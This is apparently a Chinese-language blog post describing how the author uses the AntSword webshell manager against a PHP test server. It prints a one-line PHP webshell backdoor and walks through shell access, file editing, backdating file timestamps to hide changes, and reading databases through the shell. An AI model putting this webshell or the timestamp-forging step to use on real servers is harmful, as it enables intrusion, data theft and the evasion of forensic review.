2021年10月8日 星期五

AntSword蟻劍使用心得

PHP webshell後門和代碼審計  中介紹了許多PHP webshell的漏洞利用方式,我們可使用【AntSword蟻劍】對其webshell做更多的操作

 安裝

下載後第一時間校驗 md5 值
$ md5sum.exe AntSword-Loader-v4.0.3-win32-x64.zip
85b80052224061e42f685021f28d1975 *AntSword-Loader-v4.0.3-win32-x64.zip

解壓縮AntSword-Loader 後執行 AntSword.exe 
首次打開加載器時,界面如下圖所示:

點擊【initialize】按鈕,選擇一個空目錄作為蟻劍的工作目錄,加載器會自動下載源代碼。

AntSword-Loader下載下來的 antSword-master.zip 會被windows 10 防毒跳警告,需加白

加白後如果遇到 Unzip Error Code:[object Object] 錯誤
https://github.com/AntSwordProject/AntSword-Loader/issues/31#issuecomment-869523193  Initialization fails, showing `Unzip Error Code:[object Object]
手動解壓縮 antSword-master.zip ,然後再選擇該目錄


首次打開

添加webshell

以 PHP webshell後門和代碼審計 的 webshell-6.php 為例(1-5實際測試後不行)
create_function('', $_POST['a']);
添加
進入該URL地址
即可直接對伺服器上的文件直接做GUI的操作,例如:

編輯文件


打開來即可編輯 PHP webshell後門和代碼審計 中的  webshell-1.php ,當然 webshell-1.php 必須是www 用戶可寫入的權限

打開終端

如果你該網站(php 5.6)把exec那些 shell執行的函數禁用了,執行命令會報錯 ret=127 
否則就能以www的身份執行bash

修改文件時間

原本文件上傳時間是2021-10-08
修改成2020-10-08

linux上用ll查,該文件(修改)時間已變成 2020-10-08 
[root@localhost /www/wwwroot/webshell.bt (master)]# ll info.php
-rw-r--r--. 1 www www 16 Oct  8  2020 info.php
必須用stat才能查到正確的最後修改時間(Change)
# stat info.php
  File: ‘info.php’
  Size: 16              Blocks: 8          IO Block: 4096   regular file
Device: fd00h/64768d    Inode: 4092920     Links: 1
Access: (0644/-rw-r--r--)  Uid: ( 1000/     www)   Gid: ( 1000/     www)
Context: unconfined_u:object_r:default_t:s0
Access: 2020-10-08 20:40:50.000000000 +0800
Modify: 2020-10-08 20:40:50.000000000 +0800
Change: 2021-10-08 20:51:11.722462674 +0800
 Birth: -

連接資料庫

選定webshell =》右鍵 =》 數據操作

配置資料庫連線方式(都滲透進去了,在代碼裡面查配置文件)
可以選定資料庫和查該庫的資料(比sqlmap注入還強大,所以webshell危害更大)

其他功能

(該資料夾或文件必須是www用戶可寫)
上傳文件,新建資料夾








沒有留言:

張貼留言